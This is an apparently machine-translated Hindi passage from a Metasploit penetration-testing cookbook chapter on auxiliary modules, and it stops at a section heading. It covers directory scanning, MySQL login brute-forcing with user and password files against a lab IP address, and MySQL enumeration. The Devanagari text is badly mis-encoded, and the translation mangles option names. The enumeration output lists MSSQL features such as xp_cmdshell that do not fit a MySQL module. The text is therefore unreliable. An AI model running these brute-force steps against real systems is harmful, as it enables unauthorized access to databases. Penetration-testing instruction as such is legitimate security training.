рдореЗрдЯрд╕реНрдкреНрд▓реЛрдЗрдЯ рдкреЗрдиреЗрдЯреНрд░реЗрд╢рди рдЯреЗрд╕реНрдЯрд┐рдВрдЧ рдХреБрдХрдмреБрдХ рдХреЗ рд╕рд╛рддрд╡реЗрдВ рдХрд╛ рдЕрдиреБрд╡рд╛рдж
рдЕрдзреНрдпрд╛рдп 7. рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рдирд╛
рдЗрд╕ рдЕрдзреНрдпрд╛рдп рдореЗрдВ, рд╣рдо рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдПрдВрдЧреЗ:
- рд╕рд╣рд╛рдпрдХ рд╕реНрдХреИрди рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░реЗрдВ
- рд╕рд╣рд╛рдпрдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░реЗрдВ
- рдПрд╕рдХреНрдпреВрдПрд▓ рдЗрдВрдЬреЗрдХреНрд╢рди рдФрд░ рдбреЙрд╕ рдореЙрдбреНрдпреВрд▓
- рд╕рдВрдЪрд╛рд▓рди рдХреЗ рдмрд╛рдж рдХреЗ рдореЙрдбреНрдпреВрд▓
- рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдиреЗ рдХреА рдореВрд▓ рдмрд╛рддреЗрдВ
- рдореЙрдбреНрдпреВрд▓ рд╡рд┐рд╢реНрд▓реЗрд╖рдг
- рдкреЛрд╕реНрдЯ-рдкреНрд░реЛрдбрдХреНрд╢рди рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдирд╛
рдкрд░рд┐рдЪрдп
рдкрд╣рд▓реЗ рдЕрдзреНрдпрд╛рдп рдореЗрдВ, рд╣рдордиреЗ рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯ рдХреА рдореВрд▓ рдмрд╛рддреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╛рдд рдХреАред рд╣рдордиреЗ рдЗрд╕ рддрдереНрдп рд╕реЗ рд╢реБрд░реВ рдХрд┐рдпрд╛ рдХрд┐ рдЗрд╕рдореЗрдВ рдПрдХ рдореЙрдбреНрдпреВрд▓рд░ рд╡рд╛рд╕реНрддреБрдХрд▓рд╛ рд╣реИред рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рд╕рднреА рд╢реЛрд╖рдг, рдкреЗрд▓реЛрдб, рдПрдирдХреЛрдбрд░ рдЖрджрд┐ред рдореЙрдбреНрдпреВрд▓ рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рд╕реНрддреБрдд рдХрд░реЗрдВред рдореЙрдбреНрдпреВрд▓рд░ рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдлреНрд░реЗрдорд╡рд░реНрдХ рдХреА рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдХрд╛ рд╡рд┐рд╕реНрддрд╛рд░ рдХрд░рдирд╛ рдЖрд╕рд╛рди рдмрдирд╛рддрд╛ рд╣реИред рдХреЛрдИ рднреА рдкреНрд░реЛрдЧреНрд░рд╛рдорд░ рдЕрдкрдиреЗ рд╕реНрд╡рдпрдВ рдХреЗ рдореЙрдбреНрдпреВрд▓ рдХреЛ рд╡рд┐рдХрд╕рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдЖрд╕рд╛рдиреА рд╕реЗ рдЗрд╕реЗ рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯ рдврд╛рдВрдЪреЗ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рдг рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рд╕рд┐рд╕реНрдЯрдо рдСрдкрд░реЗрд╢рди рдХреЗ рджреМрд░рд╛рди рдХрдИ рдореЙрдбреНрдпреВрд▓ рд╢рд╛рдорд┐рд▓ рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╣рдо рдкрд░рд┐рдЪрд╛рд▓рди рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ, рдлрд┐рд░ рд╣рдо рдкреЗрд▓реЛрдб рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ, рдлрд┐рд░ рд╣рдо рдХрдИ рдкреЛрд╕реНрдЯ-рдСрдкрд░реЗрд╢рдирд▓ рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЕрдВрдд рдореЗрдВ, рд╣рдо рдЕрдкрдиреЗ рдирд┐рд╖реНрдХрд░реНрд╖реЛрдВ рдФрд░ рдкрд░рд┐рдгрд╛рдореЛрдВ рдХреЛ рдмрдЪрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдбреЗрдЯрд╛рдмреЗрд╕ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рднрд┐рдиреНрди рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдпрд╣ рдЕрдзреНрдпрд╛рдп / рдкреЗрдВрдЯреЗрд╕реНрдЯ / рдХрд╛рд░рдирд╛рдореЗ / рдлреНрд░реЗрдорд╡рд░реНрдХ 3 / рдореЙрдбреНрдпреВрд▓ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкрд░ рдХреЗрдВрджреНрд░рд┐рдд рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдпреЛрдЧреА рдореЙрдбреНрдпреВрд▓ рдХреА рдкреВрд░реА рд╕реВрдЪреА рд╣реИ рдЬреЛ рд╣рдореЗрдВ рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рдг рдореЗрдВ рдорджрдж рдХрд░реЗрдЧреАред
рд╕рд╣рд╛рдпрдХ рд╕реНрдХреИрди рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░реЗрдВ
рдЪрд▓реЛ рд╕реНрдХреИрди рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВред рд╣рдордиреЗ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╕реНрдХреИрдирд┐рдВрдЧ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рдЕрдзреНрдпрдпрди рдХрд┐рдпрд╛ рдерд╛ рдЬрдм рд╣рдордиреЗ рдиреИрдореНрдк рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдмрд╛рдд рдХреА рдереАред рдЗрд╕ рдиреБрд╕реНрдЦрд╛ рдореЗрдВ рд╣рдо рдХреБрдЫ рддреИрдпрд╛рд░ рдХрд┐рдП рдЧрдП рдореЙрдбреНрдпреВрд▓ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВрдЧреЗ рдЬреЛ рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯ рдХреЗ рд╕рд╛рде рдЖрддреЗ рд╣реИрдВред рдпрджреНрдпрдкрд┐ рдиреИрдореНрдк рдПрдХ рд╢рдХреНрддрд┐рд╢рд╛рд▓реА рд╕реНрдХреИрдирд┐рдВрдЧ рдЙрдкрдХрд░рдг рд╣реИ, рдРрд╕реА рд╕реНрдерд┐рддрд┐рдпрд╛рдБ рд╣реИрдВ рдЬрд┐рдирдореЗрдВ рдЖрдкрдХреЛ рдПрдХ рд╡рд┐рд╢реЗрд╖ рдкреНрд░рдХрд╛рд░ рдХреЗ рд╕реНрдХреИрди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, MySQL рдбреЗрдЯрд╛рдмреЗрд╕ рдХреА рдЙрдкрд╕реНрдерд┐рддрд┐ рдХреЗ рд▓рд┐рдП рд╕реНрдХреИрдирд┐рдВрдЧред рдЙрдкрд▓рдмреНрдз рд╕реНрдХреИрдирд░реЛрдВ рдХреА рд╕реВрдЪреА рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ
/ pentest / рдХрд╛рд░рдирд╛рдореЗ / рдЪреМрдЦрдЯреЗ 3 / рдореЙрдбреНрдпреВрд▓ / рд╕рд╣рд╛рдпрдХ / рд╕реНрдХреИрдирд░ рдкрд░ рдЬрд╛рдирд╛ рд╣реЛрдЧрд╛ ред рдЖрдЗрдП рдмреБрдирд┐рдпрд╛рджреА HTTP рд╕реНрдХреИрдирд░ рд╕реЗ рд╢реБрд░реВ рдХрд░реЗрдВред
Dir_scanner рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВред рд╕реНрдХреНрд░рд┐рдкреНрдЯ рджрд┐рд▓рдЪрд╕реНрдк рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ рдХреЛ рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рд╣реЛрд╕реНрдЯ рдпрд╛ рдкреВрд░реЗ рдиреЗрдЯрд╡рд░реНрдХ рдХреЛ рд╕реНрдХреИрди рдХрд░реЗрдЧреА рдЬрд┐рд╕реЗ рдЬрд╛рдирдХрд╛рд░реА рдЗрдХрдЯреНрдард╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдФрд░ рднреА рдЦреЛрдЬрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред
msf> рд╕рд╣рд╛рдпрдХ / рд╕реНрдХреИрдирд░ / http / dir_scanner рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
msf рд╕рд╣рд╛рдпрдХ (dir_scanner)> рд╡рд┐рдХрд▓реНрдк рджрд┐рдЦрд╛рдПрдВ
рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдХрд▓реНрдк (рд╕рд╣рд╛рдпрдХ / рд╕реНрдХреИрдирд░ / http / dir_scanner):
рдирд╛рдо рд╡рд░реНрддрдорд╛рди рд╕реЗрдЯрд┐рдВрдЧ рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╡рд░рдг
---- --------------- -------- -----------
DICTIONARY /opt /metasploit/msf3/data/wmap/wmap_dirs.txt рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╢рдмреНрдж рд╢рдмреНрджрдХреЛрд╢ рдХрд╛ рдХреЛрдИ рдкрде рдирд╣реАрдВ
рдкрде / рд╣рд╛рдБ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рдкрд╣рдЪрд╛рди рдХрд░рдиреЗ рдХрд╛ рдорд╛рд░реНрдЧ
RHOSTS рд╣рд╛рдБ рд▓рдХреНрд╖реНрдп рдкрддрд╛ рд╕реАрдорд╛ рдпрд╛ CIDR рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛
80 рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ рд╣рд╛рдБ рд▓рдХреНрд╖реНрдп рдкреЛрд░реНрдЯ
рддреАрди 1 рд╣рд╛рдБ рд╕рдорд╡рд░реНрддреА рдзрд╛рдЧреЗ рдХреА рд╕рдВрдЦреНрдпрд╛
VHOST рдХреЛрдИ HTTP рд╕рд░реНрд╡рд░ рд╡рд░реНрдЪреБрдЕрд▓ рд╣реЛрд╕реНрдЯ рдирд╣реАрдВ рд╣реИ
рд╢реЛ рд╡рд┐рдХрд▓реНрдк рдХрдорд╛рдВрдб рдЙрдкрд▓рдмреНрдз рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХреЛ рджрд┐рдЦрд╛рдПрдЧрд╛ рдЬреЛ рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВред
рдЖрдЗрдП рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЙрджрд╛рд╣рд░рдг рджреЗрдЦреЗрдВред
Mysql_login рдореЙрдбреНрдпреВрд▓, рдЬреЛ рдПрдХ MySQL рд╕рд░реНрд╡рд░ рдХреА рдЙрдкрд╕реНрдерд┐рддрд┐ рдХреЗ рд▓рд┐рдП рд▓рдХреНрд╖реНрдп рдХреЛ рд╕реНрдХреИрди рдХрд░рддрд╛ рд╣реИ рдФрд░, рдпрджрд┐ рдпрд╣ рдкрддрд╛ рдЪрд▓рддрд╛ рд╣реИ, рддреЛ рд╣рдорд▓рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд╛рдирд╡рд░ рдмрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбреЗрдЯрд╛рдмреЗрд╕ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░рддрд╛ рд╣реИ:
msf> рд╕рд╣рд╛рдпрдХ / рд╕реНрдХреИрдирд░ / mysql / mysql_login рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
msf> рд╡рд┐рдХрд▓реНрдк рджрд┐рдЦрд╛рдПрдВ
рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдХрд▓реНрдк (рд╕рд╣рд╛рдпрдХ / рд╕реНрдХреИрдирд░ / mysql / mysql_login):
рдирд╛рдо рд╡рд░реНрддрдорд╛рди рд╕реЗрдЯрд┐рдВрдЧ рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╡рд░рдг
---- --------------- -------- -----------
BLANK_PASSWORDS рд╕рдЪ рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рд░рд┐рдХреНрдд рдкрд╛рд╕рд╡рд░реНрдб рдЖрдЬрд╝рдорд╛рдПрдВ
BRUTEFORCE_SPEED 5 рд╣рд╛рдВ, рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдореЗрдВ рдХрд┐рддрдиреА рддреЗрдЬреА рд╣реИ, 0 рд╕реЗ 5 рддрдХ
PASSWORD рдХреЗ рд╕рд╛рде рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЛрдИ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкрд╛рд╕рд╡рд░реНрдб рдирд╣реАрдВ рд╣реИ
рдкрд╛рд╕рд╡рд░реНрдб, рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рддрд┐ рдкрдВрдХреНрддрд┐ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдирд╣реАрдВ рд╣реИ
RHOSTS рд╣рд╛рдБ рд▓рдХреНрд╖реНрдп рдкрддрд╛ рд╕реАрдорд╛ рдпрд╛ CIDR рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛
3306 рд╣рд╛рдБ рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ рд▓рдХреНрд╖реНрдп рдмрдВрджрд░рдЧрд╛рд╣
STOP_ON_SUCCESS рдЧрд▓рдд рд╣рд╛рдБ рдЬрдм рдПрдХ рд╣реЛрд╕реНрдЯ рдХреЗ рд▓рд┐рдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рддреЛ рдЕрдиреБрдорд╛рди рд▓рдЧрд╛рдирд╛ рдмрдВрдж рдХрд░реЗрдВ
рддреАрди 1 рд╣рд╛рдБ рд╕рдорд╡рд░реНрддреА рдзрд╛рдЧреЗ рдХреА рд╕рдВрдЦреНрдпрд╛
USERNAME рдХреЗ тАЛтАЛрд░реВрдк рдореЗрдВ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЛрдИ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдирд╣реАрдВ рд╣реИ
USERPASS_FILE рдХреЛрдИ рдлрд╝рд╛рдЗрд▓ рдирд╣реАрдВ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдбреЛрдВ рдХреЛ рдЕрдВрддрд░рд┐рдХреНрд╖ рд╕реЗ рдЕрд▓рдЧ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдкреНрд░рддрд┐ рдкрдВрдХреНрддрд┐ рдПрдХ рдЬреЛрдбрд╝реА
USER_AS_PASS рд╕рдЪ рдирд╣реАрдВ рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ
USER_FILE рдХреЛрдИ рдлрд╝рд╛рдЗрд▓ рдирд╣реАрдВ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо, рдкреНрд░рддрд┐ рдкрдВрдХреНрддрд┐ рдПрдХ рд╣реЛ
VERBOSE рд╕рдЪ рд╣рд╛рдБ рдХреНрдпрд╛ рд╕рднреА рдкреНрд░рдпрд╛рд╕реЛрдВ рдХреЗ рд▓рд┐рдП рдЖрдЙрдЯрдкреБрдЯ рдкреНрд░рд┐рдВрдЯ рдХрд░рдирд╛ рд╣реИ
рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рдХрдИ рдкреИрд░рд╛рдореАрдЯрд░ рд╣реИрдВред рдЖрдк рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд╕рд╛рде рдлрд╛рдЗрд▓реЗрдВ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдРрд╕рд╛ рдХрд░рддреЗ рд╣реИрдВ:
msf рд╕рд╣рд╛рдпрдХ (mysql_login)> USER_FILE /users.txt рд╕реЗрдЯ рдХрд░реЗрдВ
USER_FILE => /users.txt
msf рд╕рд╣рд╛рдпрдХ (mysql_login)> PASS_FILE /pass.txt рд╕реЗрдЯ рдХрд░реЗрдВ
PASS_FILE => /pass.txt
рдЕрдм рд╣рдо рдмреНрд░реВрдЯрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рддреИрдпрд╛рд░ рд╣реИрдВред рдпрд╣ рд▓рдХреНрд╖реНрдп рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдиреЗ рдФрд░ рдореЙрдбреНрдпреВрд▓ рдХреЛ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдмрдирд╛ рд╣реБрдЖ рд╣реИ:
msf рд╕рд╣рд╛рдпрдХ (mysql_login)> рд╕реЗрдЯ RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf рд╕рд╣рд╛рдпрдХ (mysql_login)> рдЪрд▓рд╛рдПрдВ
[*] 192.168.56.101 {306 - рджреВрд░рд╕реНрде MySQL рд╕рдВрд╕реНрдХрд░рдг 5.0.51a рдорд┐рд▓рд╛
[*] рез реп реи.резрем.5.релрем.резрежрез {рейрежрем рдХреЛрд╢рд┐рд╢ рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо: рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд╕рд╛рде рдкреНрд░рд╢рд╛рд╕рдХ: ''
рдирд┐рд╖реНрдХрд░реНрд╖ рд╕реЗ рдкрддрд╛ рдЪрд▓рддрд╛ рд╣реИ рдХрд┐ рдореЙрдбреНрдпреВрд▓ рдиреЗ рд▓рдХреНрд╖реНрдп рдкрд░ MySQL рд╕рд░реНрд╡рд░ рдХреА рдЦреЛрдЬ рдХрд░рдХреЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╢реБрд░реВ рдХреАред рдЬрд┐рд╕рдХреЗ рдмрд╛рдж рдЙрдиреНрд╣реЛрдВрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо / рдкрд╛рд╕рд╡рд░реНрдб рд╕рдВрдпреЛрдЬрди рдХреЛ рдмрджрд▓рдирд╛ рд╢реБрд░реВ рдХрд┐рдпрд╛ рдЬреЛ рдлрд╛рдЗрд▓реЛрдВ рдореЗрдВ рд╣реИрдВред
рд╕рд╣рд╛рдпрдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░реЗрдВ
рдЖрдЗрдП рдЬрд╛рдиреЗрдВ рдХреБрдЫ рдПрдбрдорд┐рди рдореЙрдбреНрдпреВрд▓ред рдореЙрдбреНрдпреВрд▓ рд╡рд┐рднрд┐рдиреНрди рдЙрджреНрджреЗрд╢реНрдпреЛрдВ рдХреА рдкреВрд░реНрддрд┐ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкреИрдирд▓ рдХреА рдЦреЛрдЬ рдпрд╛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо / рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд▓рд┐рдП рдЬрд╛рдБрдЪред рдпрд╣ рд╕рдм рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддрд╛ рд╣реИред
Mysql_enum рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ:
msf> рд╕рд╣рд╛рдпрдХ / рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ / mysql / mysql_enum рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
msf> рд╡рд┐рдХрд▓реНрдк рджрд┐рдЦрд╛рдПрдВ
рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдХрд▓реНрдк (рд╕рд╣рд╛рдпрдХ / рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ / mysql / mysql_enum):
рдирд╛рдо рд╡рд░реНрддрдорд╛рди рд╕реЗрдЯрд┐рдВрдЧ рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╡рд░рдг
---- --------------- -------- -----------
рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХреЗ рд▓рд┐рдП рдкрд╛рд╕рд╡рд░реНрдб рдирд╣реАрдВ
RHOST рд╣рд╛рдБ рд▓рдХреНрд╖реНрдп рдкрддрд╛
3306 рд╣рд╛рдБ рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ рд▓рдХреНрд╖реНрдп рдмрдВрджрд░рдЧрд╛рд╣
USERNAME no рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдирд╣реАрдВ
рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдореЙрдбреНрдпреВрд▓ рд▓реЙрдЧрд┐рди, рдкрд╛рд╕рд╡рд░реНрдб рдФрд░
рдЖрд░рдПрдЪрдУрдПрд╕рдЯреА рдорд╛рдкрджрдВрдбреЛрдВ рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░рддрд╛ рд╣реИред рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ MySQL рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рд╕рд╛рде рд╣реА рд╕рд╛рде рдЬрд╛рдирд╡рд░ рдХреЗ рд▓рд┐рдП рднреАред рд╣рдо рдХрдорд╛рдВрдб рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рддреЗ рд╣реИрдВ:
msf рд╕рд╣рд╛рдпрдХ (mysql_enum)> рд╢реЛрд╖рдг
[*] рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдкреИрд░рд╛рдореАрдЯрд░:
[*] C2 рдСрдбрд┐рдЯ рдореЛрдб рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реИ
[*] xp_cmdshell рд╕рдХреНрд╖рдо рд╣реИ
[*] рд░рд┐рдореЛрдЯ рдПрдХреНрд╕реЗрд╕ рд╕рдХреНрд╖рдо рд╣реИ
[*] рдЕрджреНрдпрддрди рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рд╣реИ рд╕рдХреНрд╖рдо рд╣реИ
[*] рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрд▓ XPs рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реИ
[*] рдУрд▓реЗ рдСрдЯреЛрдореЗрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рдХреНрд╖рдо рдирд╣реАрдВ рд╣реИрдВ
[*] рд╕рд░реНрд╡рд░ рдкрд░ рдбреЗрдЯрд╛рдмреЗрд╕:
[*] рдбреЗрдЯрд╛рдмреЗрд╕ рдХрд╛ рдирд╛рдо: рдорд╛рд╕реНрдЯрд░
рдореЙрдбреНрдпреВрд▓ рдмрд╣реБрдд рд╕рд╛рд░реА рдЙрдкрдпреЛрдЧреА рдЬрд╛рдирдХрд╛рд░реА рджреЗрддрд╛ рд╣реИред рд╡рд╣ рд╣рдореЗрдВ рдмрддрд╛рддрд╛ рд╣реИ рдХрд┐ рд▓рдХреНрд╖реНрдп MySQL рдкрд░
cmdshell рдФрд░ рд░рд┐рдореЛрдЯ рдПрдХреНрд╕реЗрд╕ рд╕рдХреНрд╖рдо рдереЗред рдпрд╣ рдЙрд╕ рдбреЗрдЯрд╛рдмреЗрд╕ рдХрд╛ рдирд╛рдо рднреА рджреЗрддрд╛ рд╣реИ рдЬреЛ рд▓рдХреНрд╖реНрдп рдорд╢реАрди рдкрд░ рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣рд╛ рд╣реИред
рдЕрдиреНрдп рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдХрдИ рд╕рдорд╛рди рдореЙрдбреНрдпреВрд▓ рд╣реИрдВ, рдЬреИрд╕реЗ рдХрд┐ MSSQL рдФрд░ Apacheред рдСрдкрд░реЗрд╢рди рдХрд╛ рд╕рд┐рджреНрдзрд╛рдВрдд рд╕рднреА рдХреЗ рд▓рд┐рдП рд╕рдорд╛рди рд╣реИред рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП
рд╢реЛ рд╡рд┐рдХрд▓реНрдк рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рдЖрдк рдЖрд╡рд╢реНрдпрдХ рдкреИрд░рд╛рдореАрдЯрд░ рдкрд╛рд╕ рдХрд░рддреЗ рд╣реИрдВред
рдПрд╕рдХреНрдпреВрдПрд▓ рдЗрдВрдЬреЗрдХреНрд╢рди рдФрд░ рдбреЙрд╕ рдореЙрдбреНрдпреВрд▓
